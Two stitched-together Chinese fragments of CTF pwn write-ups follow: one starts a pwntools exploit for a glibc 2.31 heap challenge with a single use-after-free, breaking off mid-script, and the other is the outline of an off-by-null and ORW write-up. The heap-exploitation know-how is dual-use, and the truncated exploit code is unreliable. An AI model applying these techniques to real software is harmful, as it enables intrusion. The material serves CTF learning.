查看保护 查看ida 大致就是只能创建0x60大小的堆块，并且uaf只能利用一次 完整exp： from pwn import*#context(log_level='debug')p=process('./ezheap2.31')def alloc(content):p.sendlineafter(b'4.exit',b'1')p.send(content)def free

文章目录 前置知识整体思路高版本的off-by-nullorw exp 前置知识 未初始化内存导致的地址泄露 高版本下的off-by-null利用 glibc2.31下的orw做法 整体思路 非常综合的一道题目，和ciscn之前做过的一道silverwolf很相似，本道题目的glibc2.31的环境也让我这个只做过glibc2.27下的学到了很多。 分析程序，开启了